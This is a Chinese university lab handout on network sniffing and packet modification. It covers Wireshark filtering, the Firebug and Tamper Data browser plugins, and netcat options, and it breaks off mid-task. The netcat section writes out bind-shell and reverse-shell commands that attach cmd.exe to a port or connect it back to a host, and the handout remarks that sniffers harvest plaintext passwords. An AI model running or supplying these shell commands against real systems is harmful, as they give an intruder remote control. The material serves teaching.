实验二——网络监听与数据包修改

1、实验名称网络监听与数据包修改工具使用练习实验目的通过实验，使学生掌握协议分析工具的使用方法，能够利用协议分析工具分析数据包的内容，更加深入理解ip/tcp/http协议。另外，了解firefox浏览器调试工具以及netcat工具的基本使用方法。实验平台以win2003为主机，ubuntu为服务器实验工具1. 掌握网络抓包分析工具wireshark的使用2. 掌握ip/tcp/http协议分析技能3. 掌握firefox浏览器调试工具的使用4. 掌握netcat工具的使用实验步骤【实验原理】wireshark wireshark是一个有名的网络端口探测器，是可以在windows、unix等各种平

2、台运行的网络监听软件，它主要是针对tcp/ip协议的不安全性对运行该协议的机器进行监听。其功能相当于windows下的sniffer，都是在一个共享的网络环境下对数据包进行捕捉和分析，而且还能够自由地为其增加某些插件以实现额外功能。其最常用的功能是被攻击者用来检测被攻击电脑通过23（telnet）和110（pop3）端口进行的一些明文传输数据，以轻松得到用户的登录口令和邮件账号密码。对于网络管理员来说，也可以通过抓包分析，来确定一些异常的流量和局域网内部的非正常用户与外界的通信，比如说对于现在比较占用网络带宽的诸如bit torrent等p2p应用软件流量，通过使用该软件确定这些流量，网络管理

3、员就可以使用流量控制（tc）的方法来规范、合理的分配带宽资源，提高网络的利用率。wireshark可以在/download/上下载，该软件有极其方便和友好的图形用户界面，并且能够使得用户通过图形界面的配置和选择，针对多块网卡、多个协议进行显示，效果非常好。目前最新版本为：wireshark 0.99。wireshark安装后自动安装winpcap 4.0 ，winpcap是unix下的libpcap移植到windows下的产物,他是一个gpl项目。winpcap工作于驱动(driver)层，所以能以很高的效率进行网络操作。 winpcap提供了以下

4、强大的功能：1捕获原始的数据包 ；2设置filter,只捕获自己敢兴趣的数据包 ；3方便的把捕获的数据包输出到文件和从文件输入 ；4发送原始的数据包 ；5统计网络流量。 wireshark主窗口有很多的gui程序组成(1) file(文件)：这个菜单包含：打开文件、合并文件、保存/打印/导出整个或部分捕获文件、退出。(2) edit(编辑)这个菜单包括：查找包、时间参照、标记一个或多个包、设置参数、(剪切、复制、粘贴)。(3) view(查看)：这个菜单控制捕获数据的显示，包括：给定特定的一类包标以不同的颜色、字体缩放、在一个新窗口中显示一个包、展开&折叠详细信息面板的树状结构。(4) go：

5、这个菜单实现转到一个特定包。.(5) apture(捕获)：这个菜单实现开始、停止捕获，编辑捕获过滤条件的功能。(6) analyze(分析)：这个菜单包含编辑显示过滤、enable(开)或disable(关)协议解码器、配置用户指定的解码方法、追踪一个tcp 流。(7) statistics(统计)：该菜单完成统计功能。包括捕获的包的一个摘要、基于协议的包的数量等树状统计图等许多功(8) help(帮助)这个菜单包含了一些对用户有用的信息。比如基本帮助、支持的协议列表、手册页、在线访问到网站等等。 设置wireshark的过滤规则在用wireshark截获数据包之前，应该为其设置相应的过滤规

6、则，可以只捕获感兴趣的数据包。wireshark使用与tcpdump相似的过滤规则，并且可以很方便地存储已经设置好的过滤规则。要为wireshark配置过滤规则，首先单击“capture”选单，然后选择“capture filters.”菜单项，打开“wireshark ：capture filter”对话框。因为此时还没有添加任何过滤规则，因而该对话框右侧的列表框是空的。在wireshark中添加过滤器时，需要为该过滤器指定名字及规则。图1：为wireshark添加一个过滤器例如，要在主机和1间创建过滤器，可以在“filter name”编辑框内输

7、入过滤器名字“cjh”，在“filter string”编辑框内输入过滤规则“host and 1”，然后单击“新建”按钮即可。 应用wireshark过滤规则进行抓包要将过滤器应用于嗅探过程，需要在截获数据包之前或之后指定过滤器。要为嗅探过程指定过滤器，并开始截获数据包，可以单击“capture”选单，打开“iterface”对话框，单击要抓包的网卡对应的“options:”按钮，然后对该网络接口进行过滤器设置，其设置内容包括： interface（接口）这个字段指定在哪个接口进行捕获。这是一个下拉字段，只能从中选择wireshark 识别出来的

8、接口，默认是第一块支持捕获的非loopback 接口卡。如果没有接口卡，那么第一个默认就是第一块loopback 接口卡。在某些系统中，loopback 接口卡不能用来捕获（loopback 接口卡在windows平台是不可用的）。 ip address（ip 地址）所选接口卡的ip 地址。如果不能解析出ip 地址，则显示unknown link-layer header type（链路层头类型）除非你在极个别的情况下可能用到这个字段，大多数情况下保持默认值。具体的描述，见” buffer size: n megabyte(s) （缓冲区大小：n 兆）输入捕获时使用的buffer 的大小。这是

9、核心buffer 的大小，捕获的数据首先保存在这里，直到写入磁盘。如果遇到包丢失的情况，增加这个值可能解决问题。 capture packets in promiscuous mode （在混杂模式捕获包）这个选项允许设置是否将网卡设置在混杂模式。如果不指定，wireshark 仅仅捕获那些进入你的计算机的或送出你的计算机的包。(而不是lan 网段上的所有包). limit each packet to n bytes （限制每一个包为n 字节）这个字段设置每一个数据包的最大捕获的数据量。有时称作snaplen 。如果disable 这个选项默认是65535, 对于大多数协议来讲中够了。 ca

10、pture filter（捕获过滤）这个字段指定一个捕获过滤。 “在捕获时进行过滤”部分进行讨论。默认是空的，即没过过滤。也可以点击标为capture filter 的按钮, wireshark 将弹出capture filters（捕获过滤）对话框，来建立或者选择一个过滤。在选择了所需要的过滤器后，单击“确定”按钮，整个嗅探过程就开始了。wireshark可以实时显示截获的数据包，因此能够帮助网络管理员及时了解网络的运行状况，从而使其对网络性能和流量能有一个比较准确的把握。firefoxfirebug是firefox下的一款开发类插件，现属于firefox的五星级强力推荐插件之一。它集htm

11、l查看和编辑、javascript控制台、网络状况监视器于一体，是开发javascript、css、html和ajax的得力助手。在安装好插件之后，先用firefox浏览器打开需要测试的页面，然后点击右下方的绿色按钮或使用快捷键f12唤出firebug插件，它会将当前页面分成上下两个框架，如图2所示。图2：firebug插件展开图示tamper-data可监视 http 请求并记录下每个请求所耗费的时间，并能够任意修改浏览器发出的 http 请求的头的内容。 可利用修改请求头的功能来调试程序、寻找安全漏洞，也利用监视功能找出应用程序瓶颈。tamper-data的使用很简单，点击 firefox

12、 菜单栏上“工具”菜单项里面的“tamper data”，就会弹出 tamper data 的主窗口。图3：tamper-data插件展开图示：netcatnetcat是一个简单而有用的工具，通过使用tcp或udp协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接。 参数介绍： nc.exe -h即可看到各参数的使用方法。 基本格式：nc -options hostname ports ports . nc -l -p port options hostname port

13、 -d 后台模式 -e prog 程序重定向，一旦连接，就执行 危险! -g gateway source-routing hop points, up to 8 -g num source-routing pointer: 4, 8, 12, . -h 帮助信息 -i secs 延时的间隔 -l 监听模式，用于入站连接 -l 连接关闭后,仍然继续监听 -n 指定数字的ip地址，不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 随机本地及远程端口 -s addr 本地源地址 -t 使用telnet交互方式 -u udp模式 -v 详细输出-用两个-v

14、可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉-用于扫描时 端口的表示方法可写为m-n的范围格式。 基本用法： 1)连接到remote主机，例子： 格式：nc -nvv 192.168.x.x 80 讲解：连到192.168.x.x的tcp80端口 2)监听local主机，例子： 格式：nc -l -p 80 讲解：监听本机的tcp80端口 3)扫描远程主机，例子： 格式：nc -nvv -w2 -z 192.168.x.x 80-445 讲解：扫描192.168.x.x的tcp80到tcp445的所有端口 4)remote主机绑定shell，例子： 格式：nc

15、 -l -p 5354 -t -e c:winntsystem32cmd.exe 讲解：绑定remote主机的cmdshell在remote主机的tcp5354端口 5)remote主机绑定shell并反向连接，例子： 格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 讲解：绑定remote主机的cmdshell并反向连接到192.168.x.x的tcp5354端口 6)发送编写好的数据包内容，例子： 格式1：nc -nvv 192.168.x.x 80 internet选项-高级”中选择“使用http1.1”，访问siteserver c

16、ms网站或者empirecms网站抓包，查看http/1.1的request数据包的内容；在“工具-internet选项-高级”中不选择“使用http1.1”，访问siteserver cms网站或者empirecms网站抓包，查看http/1.0的request数据包的内容；对比二者的区别2. 安装firefox浏览器，安装firebug与tamper data插件，打开火狐浏览器，点击菜单栏里面的 工具附加组件“设置标志”从文件安装附加组件选中组建并点击打开重启浏览器便成功用firebug分析访问siteserver cms网站或者empirecms网站的过程，打开火狐浏览器，点开网站，点击f12键用tamper data修改http 请求中的某项内容，并抓包查看修改结果：首先打开firefox浏览器-点击工具栏中“工具”-附加组件-获取附加组件中输入查询提交“tamper data”在查询结果中点击“添加至firefox”，就会自动将该插件安装入firefox中，以后要使用的话可以选择“工具”-tamper data 即可打开。可以用这个工具查看graphs3. 解压“nc11nt.rar”，自己编写一个httprequest